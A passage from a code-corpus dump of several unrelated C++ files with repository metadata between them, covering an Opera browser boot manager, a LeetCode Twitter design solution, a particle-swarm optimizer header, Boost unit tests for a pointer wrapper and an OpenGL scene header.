OpStatus::OK; //FIXME don't check any status actually } // Usually called from StartBrowser, i.e. before UI is displayed, but may be also called // some time after start sequence completes if Opera needs to contact autoupdate server // to get country code, which is then used to initialize paths to customization files. // Aborts only on OOMs. Step that fail with other error codes are just ignored (there is // not much that can be done esp. if this function is called when UI is already displayed). OP_STATUS OpBootManager::LoadCustomizations() { // this function must not be called after customizations are loaded OP_ASSERT(!g_searchEngineManager->HasLoadedConfig()); OP_ASSERT(!g_speeddial_manager->HasLoadedConfig()); OP_ASSERT(!g_desktop_bookmark_manager->GetBookmarkModel()->Loaded()); if (m_delay_customizations_timer == NULL) { // Apply additional delay if requested. This is only used to test browser's // behaviour without customizations. CommandLineArgument* delay_arg = g_commandline_manager->GetArgument(CommandLineManager::DelayCustomizations); if (delay_arg && delay_arg->m_int_value > 0) { m_delay_customizations_timer = OP_NEW(OpTimer, ()); if (m_delay_customizations_timer) { m_delay_customizations_timer->SetTimerListener(this); m_delay_customizations_timer->Start(delay_arg->m_int_value * 1000); return OpStatus::OK; } } } else { OP_DELETE(m_delay_customizations_timer); m_delay_customizations_timer = NULL; } OP_PROFILE_METHOD("Customization files loaded"); Application::RunType run_type; // If Opera restarted country check that did not finish in previous session then // we need previous session's run type to trigger pending upgrades. if (m_previous_ccs == CCS_IN_PROGRESS_FIRST_CLEAN_RUN) run_type = Application::RUNTYPE_FIRSTCLEAN; else if (m_previous_ccs == CCS_IN_PROGRESS_FIRST_RUN) run_type = Application::RUNTYPE_FIRST; else run_type = DetermineFirstRunType(); if (m_previous_ccs == CCS_IN_PROGRESS_FIRST_CLEAN_RUN || m_previous_ccs == CCS_IN_PROGRESS_FIRST_RUN) { // This should trigger pending upgrades in functions that themselves check // current run type (e.g. DesktopBookmarkManager::UpgradeDefaultBookmarks). // Usually they also check this flag. g_region_info->m_changed = true; } TRAPD(err, g_searchEngineManager->LoadSearchesL()); RETURN_IF_MEMORY_ERROR(err); // Need to check if the pref was downloaded on the last run BOOL tld_downloaded = g_pcui->GetIntegerPref(PrefsCollectionUI::GoogleTLDDownloaded) ? TRUE : FALSE; // Update the google TLD on updates if (!tld_downloaded || run_type == Application::RUNTYPE_FIRST_NEW_BUILD_NUMBER || run_type == Application::RUNTYPE_FIRST || run_type == Application::RUNTYPE_FIRSTCLEAN) { // First reset the pref so a new one is retrieved on upgrade/installation TRAP(err, g_pcui->WriteIntegerL(PrefsCollectionUI::GoogleTLDDownloaded, 0)); RETURN_IF_MEMORY_ERROR(err); // Now get the new TLD google server RETURN_IF_MEMORY_ERROR(g_searchEngineManager->UpdateGoogleTLD()); } // Convert old SearchType prefs when upgrading from version < 10.60 (DSK-304850) if (run_type == Application::RUNTYPE_FIRST) { OperaVersion tensixty; RETURN_IF_ERROR(tensixty.Set(UNI_L("10.60.01"))); if (GetPreviousVersion() < tensixty) { RETURN_IF_MEMORY_ERROR(UpgradeSearchTypePrefs()); } } if (m_startup_sequence->IsBrowserStarted()) { // If already started then there can be some search widgets with empty // search GUIDs - let them know that search engines are loaded g_application->SettingsChanged(SETTINGS_SEARCH); // Trigger update of search buttons in toolbars and panels (DSK-359163) g_application->SettingsChanged(SETTINGS_TOOLBAR_SETUP); // Update search engines in all open document windows (DSK-362425) SearchTemplate* default_search = g_searchEngineManager->GetDefaultSearch(); if (default_search && default_search->GetUniqueGUID().HasContent()) { OpVector<DesktopWindow> browser_windows; g_application->GetDesktopWindowCollection().GetDesktopWindows(OpTypedObject::WINDOW_TYPE_DOCUMENT, browser_windows); for (UINT32 i = 0; i < browser_windows.GetCount(); ++i) { OpBrowserView* browser_view = browser_windows.Get(i)->GetBrowserView(); if (browser_view && browser_view->GetSearchGUID().IsEmpty()) { browser_view->SetSearchGUID(default_search->GetUniqueGUID()); } } } } g_desktop_extensions_manager->StartAutoStartServices(); RETURN_IF_MEMORY_ERROR(g_speeddial_manager->Load(run_type == Application::RUNTYPE_FIRSTCLEAN)); if (run_type == Application::RUNTYPE_FIRST) { OperaVersion elevenfifty; RETURN_IF_ERROR(elevenfifty.Set(UNI_L("11.50.01"))); if (GetPreviousVersion() < elevenfifty) { /* We can't do it in OpStartupSequence::UpgradeBrowserSettings like the rest of * update stuff as it has to be done after SpeedDialManager::Load is called. */ OpVector<OpGadget> speed_dial_extensions; if (OpStatus::IsSuccess(g_desktop_extensions_manager->GetAllSpeedDialExtensions(speed_dial_extensions))) { for (unsigned i = 0, count = speed_dial_extensions.GetCount(); i < count; ++i) { OpGadget* extension = speed_dial_extensions.Get(i); if (g_speeddial_manager->FindSpeedDialByWuid(extension->GetIdentifier()) < 0) { OpStatus::Ignore(g_desktop_extensions_manager->AddSpeedDial(*extension)); } } } } } if (g_desktop_bookmark_manager) RETURN_IF_MEMORY_ERROR(g_desktop_bookmark_manager->Load(run_type == Application::RUNTYPE_FIRSTCLEAN)); if (g_favicon_manager) RETURN_IF_MEMORY_ERROR(g_favicon_manager->InitSpecialIcons()); // Setup path to regional web turbo settings if this is the first run. It will be updated automatically when Opera // receives country code from the Autoupdate server. if (run_type == Application::RUNTYPE_FIRSTCLEAN) { RETURN_IF_MEMORY_ERROR(FileUtils::SetTurboSettingsPath()); } #ifdef ENABLE_USAGE_REPORT if(g_pcui->GetIntegerPref(PrefsCollectionUI::EnableUsageStatistics)) { g_usage_report_manager = OP_NEW(OpUsageReportManager, (UNI_L("usagereport/report.xml"), OPFILE_HOME_FOLDER)); RETURN_OOM_IF_NULL(g_usage_report_manager); } #endif // ENABLE_USAGE_REPORT if (run_type == Application::RUNTYPE_FIRST_NEW_BUILD_NUMBER || run_type == Application::RUNTYPE_FIRST || run_type == Application::RUNTYPE_FIRSTCLEAN) { RETURN_IF_MEMORY_ERROR(g_desktop_extensions_manager->InstallCustomExtensions()); } TRAP(err, g_pcui->WriteIntegerL(PrefsCollectionUI::CountryCheck, static_cast<int>(CCS_DONE))); RETURN_IF_MEMORY_ERROR(err); // Account Manager may trigger Master Password Dialog, so it should be initialized after // Opera displays browser window. If this function was delayed then browser window is // already displayed. Otherwise Account Manager will be started in StartBrowser. if (m_startup_sequence->IsBrowserStarted()) RETURN_IF_MEMORY_ERROR(g_desktop_account_manager->Start()); return OpStatus::OK; } OP_STATUS OpBootManager::UpgradeSearchTypePrefs() { PrefsFile *reader = const_cast<PrefsFile *>(g_prefsManager->GetReader()); RETURN_VALUE_IF_NULL(reader, OpStatus::ERR_NULL_POINTER); RETURN_IF_LEAVE(reader->LoadAllL()); bool write_search = false; // do we need to write the searches? // Convert the Search Type prefs from the old format to the new // First we need to determine if the DefaultSearchType and/or DefaultSpeeddialSearchType pref are located in the ini file. if(reader->IsKey("User Prefs", "Speed Dial Search Type")) { OpString search_value; RETURN_IF_LEAVE(reader->ReadStringL("User Prefs", "Speed Dial Search Type", search_value)); if(search_value.HasContent() && g_searchEngineManager->GetByUniqueGUID(search_value)) { SearchTemplate *search = g_searchEngineManager->GetDefaultSpeedDialSearch(); if(search && search_value.Compare(search->GetUniqueGUID())) { // the search is different, update it in the search engine manager RETURN_IF_ERROR(g_searchEngineManager->SetDefaultSpeedDialSearch(search_value)); write_search = true; } } } if(reader->IsKey("User Prefs", "Search Type")) { OpString search_value; RETURN_IF_LEAVE(reader->ReadStringL("User Prefs", "Search Type", search_value)); if(search_value.HasContent() && g_searchEngineManager->GetByUniqueGUID(search_value)) { SearchTemplate *search = g_searchEngineManager->GetDefaultSearch(); if(search && search_value.Compare(search->GetUniqueGUID())) { // the search is different, update it in the search engine manager RETURN_IF_ERROR(g_searchEngineManager->SetDefaultSearch(search_value)); write_search = true; } } } if(write_search) { RETURN_IF_MEMORY_ERROR(g_searchEngineManager->Write()); } return OpStatus::OK; } /*********************************************************************************** ** ** ShowFirstRunPage ** ***********************************************************************************/ inline void OpBootManager::ShowFirstRunPage( const BOOL upgrade ) { // When running watir tests always load opera:debug if (CommandLineManager::GetInstance()->GetArgument(CommandLineManager::WatirTest)) { // DSK-361642: Make sure we ignore the modifier keys when opening opera:debug g_application->GoToPage(UNI_L("opera:debug"), FALSE, FALSE, FALSE, 0, static_cast<URL_CONTEXT_ID>(-1), TRUE); } else { if (GoToPermanentHomepage()) return; if (g_desktop_product->GetProductType() == PRODUCT_TYPE_OPERA_NEXT) { // Fix for DSK-348094 - opera.com/portal/next page not shown on Next upgrades g_application->GoToPage(OPERA_NEXT_PAGE, TRUE); } else if (upgrade) { // this is to show you a nice thank-you-for-upgrading page g_application->GoToPage(OPERA_UPGRADE_PAGE, TRUE); } else { // this is redirected to /startup/, but counting installs g_application->GoToPage(OPERA_FIRST_RUN_PAGE); } } } bool OpBootManager::GoToPermanentHomepage() { #ifdef PERMANENT_HOMEPAGE_SUPPORT if (1 == g_pcui->GetIntegerPref(PrefsCollectionUI::PermanentHomepage)) { g_application->GoToPage(g_pccore->GetStringPref(PrefsCollectionCore::HomeURL)); return true; } #endif //PERMANENT_HOMEPAGE_SUPPORT return false; } /*********************************************************************************** ** ** SetOperaRunning ** ***********************************************************************************/ OP_STATUS OpBootManager::SetOperaRunning(BOOL is_running) { OP_STATUS err = OpStatus::ERR; if (g_prefsManager) { // always reset the save folder to the download directory on startup // TRAP(err, g_pcfiles->WriteDirectoryL(OPFILE_SAVE_FOLDER, g_folder_manager->GetFolderPath(OPFILE_DOWNLOAD_FOLDER) )); time_t current_time = g_timecache->CurrentTime(); if (is_running) { TRAP(err, g_pcui->WriteIntegerL(PrefsCollectionUI::StartupTimestamp, current_time)); } else { TRAP(err, g_pcui->WriteIntegerL(PrefsCollectionUI::TotalUptime, \ g_pcui->GetIntegerPref(PrefsCollectionUI::TotalUptime) + \ current_time - g_pcui->GetIntegerPref(PrefsCollectionUI::StartupTimestamp)); \ g_pcui->ResetIntegerL(PrefsCollectionUI::StartupTimestamp)); } TRAP(err, g_pcui->WriteIntegerL(PrefsCollectionUI::Running, is_running); \ g_prefsManager->CommitL()); OP_ASSERT(OpStatus::IsSuccess(err)); // Not possible to commit opera6.ini? } return err; } #ifdef M2_MERLIN_COMPATIBILITY /*********************************************************************************** ** ** UpdateMail ** ***********************************************************************************/ inline BOOL OpBootManager::UpdateMail() { if (g_m2_engine && StoreUpdater::NeedsUpdate()) { DesktopWindow* desktop = g_application->GetDesktopWindowCollection().GetDesktopWindowByType(OpTypedObject::WINDOW_TYPE_BROWSER); // Ask user if they want to update now if (SimpleDialog::ShowDialog(WINDOW_NAME_ASK_UPDATE_MAIL, desktop, Str::D_MAIL_STORE_UPDATE_ASK_TEXT, Str::D_MAIL_STORE_UPDATE_TITLE, Dialog::TYPE_YES_NO, Dialog::IMAGE_QUESTION) == Dialog::DIALOG_RESULT_YES) { MailStoreUpdateDialog* update_dialog = OP_NEW(MailStoreUpdateDialog, ()); if (update_dialog) { update_dialog->Init(desktop); return TRUE; } } } return FALSE; } #endif // M2_MERLIN_COMPATIBILITY /*********************************************************************************** ** ** IsUpdateCheckNeeded ** ***********************************************************************************/ BOOL OpBootManager::IsUpgradeCheckNeeded() { return ( (!g_application->IsEmBrowser()) && (!g_pcnet->GetIntegerPref(PrefsCollectionNetwork::OfflineMode)) && (g_pcui->GetIntegerPref(PrefsCollectionUI::CheckForNewOpera) > 0) && ((time_t)g_pcui->GetIntegerPref(PrefsCollectionUI::CheckForNewOpera) < g_timecache->CurrentTime()) ); } /*********************************************************************************** ** ** PerformUpgradesCheck ** ***********************************************************************************/ #ifndef AUTO_UPDATE_SUPPORT void OpBootManager::PerformUpgradesCheck(BOOL informIfNoUpdate) { if (m_updates_checker) { // A checker already exists. if (m_updates_checker->CanSafelyBeDeleted()) { // The check is done and the checker can be deleted so that a new checker can be instantiated. OP_DELETE(m_updates_checker); m_updates_checker = NULL; } else { // The check is still ongoing and the checker is busy. No need to interrupt, just let this check // run to completion. return; } } // After cleaning up, we are ready to make a new checker and start it. if ((m_updates_checker = OP_NEW(NewUpdatesChecker, (informIfNoUpdate))) != NULL) // TODO: Make sure that GetActiveDesktopWindow doesn't require any initalization that is not done at this stage. m_updates_checker->PerformNewUpdatesCheck(); // We don't delete the checker here, because it needs to exist when the callbacks from the // download comes in. It can be destroyed later, when it has finished its work. // If there is no appropriate place for its deletion before the destruction of Application, // then it will just be wasted space. (The alternative is to have it delete itself, and the risk that // that involves seems like a bigger drawback than a few wasted bytes.) // Beware: You must check that the instance is done before you delete it, call // BOOL NewUpdatesChecker::CanSafelyBeDeleted() to check. } #endif //! AUTO_UPDATE_SUPPORT #if defined(LIBSSL_AUTO_UPDATE) void OpBootManager::OnTaskTimeOut(OpScheduledTask* task) { if(task == &m_ssl_autoupdate_task) { // Check for SSL autoupdates (Certificates and EV) g_main_message_handler->PostMessage(MSG_SSL_START_AUTO_UPDATE, 0, 0); } } #endif // LIBSSL_AUTO_UPDATE /*********************************************************************************** ** ** OpenCommandlineURLs ** ***********************************************************************************/ void OpBootManager::ExecuteCommandlineArg(OpVector<OpString>* commandline_urls) { if(commandline_urls && commandline_urls->GetCount()) { OpenURLSetting setting; if (CommandLineManager::GetInstance()->GetArgument(CommandLineManager::NewWindow)) { setting.m_new_window = YES; } else if (CommandLineManager::GetInstance()->GetArgument(CommandLineManager::NewTab)) { setting.m_new_page = YES; } else if (CommandLineManager::GetInstance()->GetArgument(CommandLineManager::BackgroundTab)) { setting.m_new_page = YES; setting.m_in_background = YES; } if (setting.m_new_window == NO && setting.m_new_page == NO && !CommandLineManager::GetInstance()->GetArgument(CommandLineManager::ActiveTab)) { setting.m_new_page = YES; } if (CommandLineManager::GetInstance()->GetArgument(CommandLineManager::NewPrivateTab)) { setting.m_is_privacy_mode = TRUE; } for(unsigned int i=0; i < commandline_urls->GetCount(); i++) { if (!g_desktop_gadget_manager->OpenIfGadgetFolder(*(commandline_urls->Get(i)), TRUE)) { // Make sure a at least one main window is running, so URL's can be launched in there BrowserDesktopWindow* browser = g_application->GetActiveBrowserDesktopWindow(); if (!browser) browser = g_application->GetBrowserDesktopWindow(FALSE, FALSE, TRUE); //don't force new window, not in background, but force new page if (i > 0) { setting.m_new_window = NO; setting.m_new_page = YES; } setting.m_address.Set( commandline_urls->Get(i)->CStr() ); g_application->OpenURL( setting ); } } } else if(CommandLineManager::GetInstance()->GetArgument(CommandLineManager::NewPrivateTab)) { // Make sure a at least one main window is running, so URL's can be launched in there BrowserDesktopWindow* browser = g_application->GetActiveBrowserDesktopWindow(); if (!browser) { browser = g_application->GetBrowserDesktopWindow(FALSE, FALSE, TRUE); //don't force new window, not in background, but force new page } if (browser) { OpenURLSetting setting; setting.m_is_privacy_mode = TRUE; setting.m_force_new_tab = TRUE; setting.m_new_page = YES; g_application->OpenURL( setting ); } } else if(CommandLineManager::GetInstance()->GetArgument(CommandLineManager::NewTab)) { // Make sure a at least one main window is running, so URL's can be launched in there BrowserDesktopWindow* browser = g_application->GetActiveBrowserDesktopWindow(); if (!browser) { browser = g_application->GetBrowserDesktopWindow(FALSE, FALSE, TRUE); //don't force new window, not in background, but force new page } if(browser) { OpenURLSetting setting; setting.m_force_new_tab = TRUE; setting.m_new_page = MAYBE; g_application->OpenURL( setting ); } } } /*********************************************************************************** ** ** RecoverOpera ** ***********************************************************************************/ inline void OpBootManager::RecoverOpera(WindowRecoveryStrategy strategy) { OP_ASSERT(m_startup_sequence); if (Restore_AutoSavedWindows == strategy) { RecoverSession(g_session_manager->ReadSession(UNI_L("autosave"))); } else if (Restore_RegularStartup == strategy) { OpINT32Vector* sessions = m_startup_sequence->GetSessions(); OpSession* default_session = m_startup_sequence->GetDefaultSession(); if (sessions) { for (unsigned i = 0; i < sessions->GetCount(); ++i) { OpSession* session = g_session_manager->ReadSession(sessions->Get(i)); RecoverSession(session); } } else if (default_session) { // in this case we want to take over default_session object m_startup_sequence->SetDefaultSession(NULL); RecoverSession(default_session); } } else if (Restore_Homepage == strategy) { g_application->GoToPage(g_pccore->GetStringPref(PrefsCollectionCore::HomeURL)); } else if (Restore_NoWindows == strategy && !IsSDI()) { DocumentDesktopWindow* page = NULL; #ifdef _MACINTOSH_ g_application->GetBrowserDesktopWindow(TRUE, FALSE, TRUE, &page); #else g_application->GetBrowserDesktopWindow(TRUE, FALSE, !g_pcui->GetIntegerPref(PrefsCollectionUI::AllowEmptyWorkspace), &page); #endif // _MACINTOSH_ } #ifdef WEBSERVER_SUPPORT if (g_webserver_manager->IsFeatureEnabled()) { OP_PROFILE_METHOD("Auto started services"); // Try and start them now in case the webserver is already running g_desktop_gadget_manager->StartAutoStartServices(); } #endif // WEBSERVER_SUPPORT } void OpBootManager::RecoverSession(OpSession* session_ptr) { OP_PROFILE_METHOD("Created session windows"); OpSharedPtr<OpSession> session(session_ptr); OP_STATUS err = m_application->CreateSessionWindows(session); if (OpStatus::IsError(err)) { // don't allow overwriting the session if this failed g_session_manager->SetReadOnly(TRUE); } } int OpBootManager::TryExit() { return 0; } void OpBootManager::OnTimeOut(OpTimer* timer) { if (timer == m_fullscreen_timer) { KioskManager::GetInstance()->SetEnableFilter(FALSE); BOOL handled = g_input_manager->InvokeAction(OpInputAction::ACTION_ENTER_FULLSCREEN); KioskManager::GetInstance()->SetEnableFilter(TRUE); if (handled) { OP_DELETE(timer); m_fullscreen_timer = NULL; g_desktop_global_application->OnStarted(); } else { timer->Start(FULLSCREEN_TIMEOUT); } } else if (timer == m_delay_customizations_timer) { OP_ASSERT(m_country_checker == NULL); LoadCustomizations(); } else { OP_ASSERT(!"Unknown timer"); } }
ffa5c98489d6eaee7492fc423d2efada246743b6
830fa54fadf84a020219b40f152ba9fad050da85
/src/355.design-twitter.cpp
14749657ae0eb788dba5799ba9dcb9a7eee81da7
[]
no_license
Jinchenyuan/LeetCode
fbedb88c9ef7654b41da25f2c1d149ecdef6d54e
6de769c7a3312b20d24efcb64356515f472efd4b
refs/heads/master
2023-05-04T23:31:33.901465
2023-04-22T16:32:54
2023-04-22T16:32:54
186,218,266
2
0
null
null
null
null
UTF-8
C++
false
false
4,988
cpp
355.design-twitter.cpp
/* * @lc app=leetcode id=355 lang=cpp * * [355] Design Twitter */ #include <iostream> #include <vector> #include <algorithm> #include <map> using namespace std; // @lc code=start class Twitter { struct msg { int msgId; int token; msg(int m, int t):msgId(m), token(t){} }; struct user { int userId; vector<int> followingVec; vector<struct msg> messages; user(int u):userId(u){} }; public: /** Initialize your data structure here. */ Twitter():_token(0) { } /** Compose a new tweet. */ void postTweet(int userId, int tweetId) { struct msg m = createMsg(tweetId); map<int, struct user>::iterator ite = _users.find(userId); if (ite != _users.end()) { ite->second.messages.push_back(m); return; } struct user u = createUser(userId); u.messages.push_back(m); _users.insert({userId, u}); } /** Retrieve the 10 most recent tweet ids in the user's news feed. Each item in the news feed must be posted by users who the user followed or by the user herself. Tweets must be ordered from most recent to least recent. */ vector<int> getNewsFeed(int userId) { vector<int> ret; vector<struct msg> allMsg; map<int, struct user>::iterator ite = _users.find(userId); if (ite == _users.end()) { return ret; } vector<struct msg> selfMsg = getUserFeeds(userId); allMsg.insert(allMsg.end(), selfMsg.begin(), selfMsg.end()); for (size_t i = 0; i < ite->second.followingVec.size(); i++) { int uId = ite->second.followingVec[i]; vector<struct msg> uMsg = getUserFeeds(uId); allMsg.insert(allMsg.end(), uMsg.begin(), uMsg.end()); } sort(allMsg.begin(), allMsg.end(), [](struct msg a, struct msg b) { return a.token > b.token; }); int aSize = allMsg.size(); size_t num = aSize >= 10 ? 10 : aSize; for (size_t i = 0; i < num; i++) { ret.push_back(allMsg[i].msgId); } return ret; } /** Follower follows a followee. If the operation is invalid, it should be a no-op. */ void follow(int followerId, int followeeId) { map<int, struct user>::iterator ite = _users.find(followerId); if (ite != _users.end()) { if (followerId == followeeId) { return; } for (size_t j = 0; j < ite->second.followingVec.size(); j++) { if (ite->second.followingVec[j] == followeeId) { return; } } ite->second.followingVec.push_back(followeeId); } else { struct user u = createUser(followerId); if (followerId != followeeId) { u.followingVec.push_back(followeeId); } _users.insert({followerId, u}); } } /** Follower unfollows a followee. If the operation is invalid, it should be a no-op. */ void unfollow(int followerId, int followeeId) { map<int, struct user>::iterator ite = _users.find(followerId); if (ite != _users.end()) { for (vector<int>::iterator iteV = ite->second.followingVec.begin(); iteV != ite->second.followingVec.end(); iteV++) { if (*iteV == followeeId) { ite->second.followingVec.erase(iteV); return; } } } else { struct user u = createUser(followerId); _users.insert({followerId, u}); } } private: struct user createUser(int userId) { struct user u(userId); return u; }; struct msg createMsg(int tweetId) { struct msg m(tweetId, _token); _token++; return m; } vector<msg> getUserFeeds(int userId, int num = 10) { vector<struct msg> ret; map<int, struct user>::iterator ite = _users.find(userId); if (ite != _users.end()) { int len = ite->second.messages.size(); int cnt = 0; for (int i = len - 1; i >= 0 && cnt < num; i--, cnt++) { ret.push_back(ite->second.messages[i]); } } return ret; } map<int, struct user> _users; int _token; }; /** * Your Twitter object will be instantiated and called as such: * Twitter* obj = new Twitter(); * obj->postTweet(userId,tweetId); * vector<int> param_2 = obj->getNewsFeed(userId); * obj->follow(followerId,followeeId); * obj->unfollow(followerId,followeeId); */ // @lc code=end
365a24a7da3b256f027afed7d688962158b92c9d
fbdff918518337282c863cecb751ac9761e4f3b3
/src/renderer/drawer/Drawer.h
fe2cbc90fd849a7d5f6a9de06e0468dddf44a8aa
[]
no_license
adharacanis/swfdrawerplus
510da7976f369c824e99479b3ab30f6563bcb83b
c256148207b139be65b6536929fd83b275a5ae44
refs/heads/master
2020-11-25T14:33:59.231157
2020-01-12T23:02:04
2020-01-12T23:02:04
228,718,758
0
0
null
null
null
null
UTF-8
C++
false
false
232
h
Drawer.h
#pragma once #include "IDrawer.h" #include "display/DisplayObject.h" class Drawer : public IDrawer { public: Drawer() = default; void draw(const boost::shared_ptr<DisplayObject>& drawable, DrawingData drawingData) override; };
6350392aa17e07abdaf728aacc6ea7cbb3ba47d8
ecb905b940a94aac366fbe485fdad5e7e0950c3c
/Image_processing_c++/main_source.cpp
03580344367f4677cef2b0be8988c71cf8e54f75
[]
no_license
Praveenk8051/image-processing-scripts
ee2c6d63fcd730bf2d5b16332bbbdf9a82750e0b
a511fd534eafc95b7083e5b7c08e8fa934444a29
refs/heads/master
2022-08-23T23:42:48.772510
2020-06-01T09:06:53
2020-06-01T09:06:53
264,140,971
0
0
null
null
null
null
UTF-8
C++
false
false
292
cpp
main_source.cpp
#include <algorithm> #include <processFiles.cpp> using namespace cv; int main() { // Call the image_process function std::string dropPath; std::string pickPath; pickPath = "/test"; dropPath = "/test_"; cout << "Hello World!"; processFiles(pickPath, dropPath); }
6575f5a384a6089d549d73b88692217f23555d06
a0b42233250e432a1d37ddb5aeee63aa0a0d235b
/IHCP_2D_Continuous_Casting_MAPSO/IHCP_2D_Continuous_Casting_MAPSO/MA_PSO.h
bc748123958a0d0d8538af47b84ff1fb887b490d
[]
no_license
WenYuZhi/InverseHeatConduct2DMAPSO
7dfbb14517755b290a4a54f026f52f55500a9d30
944147d89fbbea6e1056f5b552ad6c6699605dd5
refs/heads/master
2022-03-02T14:22:40.598696
2019-10-27T11:16:33
2019-10-27T11:16:33
217,842,167
1
0
null
null
null
null
UTF-8
C++
false
false
1,319
h
MA_PSO.h
#pragma once #ifndef MA_PSO_H #define MA_PSO_H #include <Eigen/Dense> #include "Temperature.h" #include <vector> using namespace Eigen; class MA_PSO { private: float c1, c2, omga; float vmax, vmin; int n_agent, width, width_sl; public: bool flag; float gbest; float* obj_values; float* obj_values_sl; int* best_neighbor_index, *best_neighbor_index_sl; int iteration_times; vector<int>* neighbor_index; vector<int>* neighbor_index_sl; MatrixXf gbest_position; MatrixXf lbest_position; MatrixXf lbest; MatrixXf position; MatrixXf position_copy; MatrixXf v; MatrixXf position_sl; MatrixXf position_sl_copy; Temperature* opt_problem; MA_PSO(int width, int sl_width, float c1, float c2, float omga, float vmax, float vmin, float, float, Temperature*); void computeobjvalues(); void getneighbor(); void getbestneighbor(); void competition(); void updategbest(); void updatelbest(); void updatev(); void updateposition(); void getselflearninggrid(); void computeselflearningobjvalues(); void getneighborselflearning(); void getbestneighborselflearning(); void competitionselflearning(); void print(); void print_neighbor(); ~MA_PSO(); }; #endif
813a59af6192aa02f17efbf4ddfd3198aab9df78
1b7bc0c8810624c79e1dade01bb63177058f1a28
/Voltron/Source/UnitTests/Cpp/Utilities/Memory/PointerWrappers_tests.cpp
24d234428d6e7cfe9c000b43f3f8a1378c3ffe8f
[ "MIT" ]
permissive
ernestyalumni/HrdwCCppCUDA
61f123359fb585f279a32a19ba64dfdb60a4f66f
ad067fd4e605c230ea87bdc36cc38341e681a1e0
refs/heads/master
2023-07-21T06:00:51.881770
2023-04-26T13:58:57
2023-04-26T13:58:57
109,069,731
3
0
null
null
null
null
UTF-8
C++
false
false
3,151
cpp
PointerWrappers_tests.cpp
//------------------------------------------------------------------------------ /// \file PointerWrappers_tests.cpp /// \author Ernest Yeung /// \email ernestyalumni@gmail.com //------------------------------------------------------------------------------ #include "Cpp/Utilities/Memory/PointerWrappers.h" #include <boost/test/unit_test.hpp> //#include <iostream> #include <memory> #include <tuple> using Cpp::Utilities::Memory::WrappedUniquePtr; BOOST_AUTO_TEST_SUITE(Cpp) BOOST_AUTO_TEST_SUITE(Utilities) BOOST_AUTO_TEST_SUITE(Memory) BOOST_AUTO_TEST_SUITE(PointerWrappers_tests) //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ BOOST_AUTO_TEST_CASE(DefaultConstruction) { WrappedUniquePtr<int> u_ptr {}; BOOST_TEST(u_ptr.get_object() == 0); } //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ BOOST_AUTO_TEST_CASE(ConstructsWithConstructNullPtrTag) { WrappedUniquePtr<double> u_ptr {WrappedUniquePtr<double>::ConstructNullPtr{}}; BOOST_TEST(!u_ptr.owns_object()); } // Corresponds to the ctor // explicit WrapperUniquePtr(T&& input) //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ BOOST_AUTO_TEST_CASE(ConstructsWithIntAsRValue) { WrappedUniquePtr u_ptr {5}; BOOST_TEST(u_ptr.get_object() == 5); } //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ BOOST_AUTO_TEST_CASE(OwnsObjectChecksIfThereIsAnAssociatedManagedObject) { WrappedUniquePtr u_ptr {5}; BOOST_TEST_REQUIRE(u_ptr.get_object() == 5); BOOST_TEST(u_ptr.owns_object()); } //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ BOOST_AUTO_TEST_CASE(ReleaseReleasesOwnership) { WrappedUniquePtr u_ptr {42}; int* int_ptr {u_ptr.release()}; BOOST_TEST(!u_ptr.owns_object()); BOOST_TEST((*int_ptr == 42)); } //------------------------------------------------------------------------------ //------------------------------------------------------------------------------ BOOST_AUTO_TEST_CASE(LinkNewResetsManagedObjectToTargetObject) { WrappedUniquePtr u_ptr {42}; int* int_ptr {u_ptr.release()}; BOOST_TEST_REQUIRE(!u_ptr.owns_object()); BOOST_TEST_REQUIRE((*int_ptr == 42)); // Link the pointer to the released object to a new WrappedUniquePtr. WrappedUniquePtr<int> u_ptr2 {WrappedUniquePtr<int>::ConstructNullPtr{}}; BOOST_TEST_REQUIRE(!u_ptr2.owns_object()); u_ptr2.link_new(int_ptr); // Now the new instance owns an object through its unique pointer. BOOST_TEST(u_ptr2.owns_object()); BOOST_TEST(u_ptr2.get_object() == 42); } BOOST_AUTO_TEST_SUITE_END() // PointerWrappers_tests BOOST_AUTO_TEST_SUITE_END() // Memory BOOST_AUTO_TEST_SUITE_END() // Utilities BOOST_AUTO_TEST_SUITE_END() // Cpp
dd184eb10d825ccd64fc2a65380fe15eb1b6f06e
33035c05aad9bca0b0cefd67529bdd70399a9e04
/src/boost_function_types_parameter_types.hpp
40745804ff968472e9dfd25ce7167fe36acc6855
[ "LicenseRef-scancode-unknown-license-reference", "BSL-1.0" ]
permissive
elvisbugs/BoostForArduino
7e2427ded5fd030231918524f6a91554085a8e64
b8c912bf671868e2182aa703ed34076c59acf474
refs/heads/master
2023-03-25T13:11:58.527671
2021-03-27T02:37:29
2021-03-27T02:37:29
null
0
0
null
null
null
null
UTF-8
C++
false
false
52
hpp
boost_function_types_parameter_types.hpp
#include <boost/function_types/parameter_types.hpp>
5f82e7fcc2c5319bcdf1f6c5aa54bc61181757c6
255ad6034144189e9aaff860f8580386aefa075f
/PRT_/Scene.h
fa73a6363c8e9a253f51ac9bbec9b6b4073a7bc7
[]
no_license
BigHeadJaeger/PRT_
69b022aecf47ef5e1696eb889566d219391b58c6
d23b3c12043dbe3863297dedfde29e99d81c2a55
refs/heads/master
2020-05-03T21:40:00.584433
2019-04-01T09:18:35
2019-04-01T09:18:35
null
0
0
null
null
null
null
GB18030
C++
false
false
1,678
h
Scene.h
#pragma once #include<glm.hpp> #include<gtc\matrix_transform.hpp> #include<gtc\type_ptr.hpp> #include<SOIL.h> #include"Generate.h" #include"Program.h" #include"Camera.h" #include"DiffuseObject.h" using namespace glm; class MyScene { private: //各种场景信息(相机、材质、灯光、各种物体的各种矩阵) //mesh object mat4x4 buddhaWorld; //世界矩阵 mat4x4 buddhaWorldViewProj; //最终坐标转换矩阵 //mat4x4 buddhaWorldInvTranspose; DiffuseObject dsBuddha; Light HDRLight; public: //相机 MyCamera camera; //--------------------------------------------------------------------------------- private: //VAO、VBO(buffer),以及需要传给shader的数据的location GLuint dsBuddhaVAO; GLuint dsBuddhaVertexBuffer; GLuint dsBuddhaIndexBuffer; //--------------------------------------------------------------------------------- //shader程序 ShaderProgram p1; public: void Init(string objPath, string objDataPath, ObjIndexType type, bool isTexture, string lightPath); //初始化各种信息 void Update(); //需要动画时,计算各种矩阵(暂时不传入shader中) void Draw(ObjIndexType type); //绘制场景 void PreProcess(string objPath, string objDataPath, int mode,int band, int sampNumber, ObjIndexType type, bool isTexture, string lightPath, string lightDataPath); //预计算部分 